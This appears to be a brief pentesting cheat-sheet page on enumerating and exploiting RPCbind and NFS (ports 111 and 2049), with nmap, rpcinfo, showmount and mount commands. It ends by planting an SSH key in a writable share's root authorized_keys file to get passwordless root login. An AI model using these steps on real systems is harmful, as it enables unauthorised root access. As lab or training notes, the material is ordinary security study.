111, 2049 - NFS

less than 1 minute read

Nmap Scan on RPCbind and NFS

nmap -v -p 111 10.11.1.1-254

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap -p 111 --script nfs* 10.11.1.72

Identifying if NFS is in use

rpcinfo -p 10.10.10.3

# If you get 111 and 2049 listed , shares are enable and we can mount them

Show all mounts

showmount -e 10.10.10.3

mkdir /mnt/nfs

mount -t nfs $ip:/share /mnt/nfs

Unmounting the shares

umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS system).
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore.

Further Exploitation

If you can write to the remote hosts, try to put ssh key there so that we can get remote ssh without password

ssh keygen
# Generating ssh keys

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Putting it to remote host

ssh root@$ip
# Now can login without password on target

Share on

X Facebook LinkedIn Bluesky

111, 2049 - NFS

Nmap Scan on RPCbind and NFS

Identifying if NFS is in use

Show all mounts

Unmounting the shares

Further Exploitation

Share on

You May Also Enjoy

Windows

Linux

General

Dumping SAM file

Nmap Scan on RPCbind and NFS

Identifying if NFS is in use

Show all mounts

Mount a NFS share

Unmounting the shares

Further Exploitation

Share on

You May Also Enjoy

Windows

Linux

General

Dumping SAM file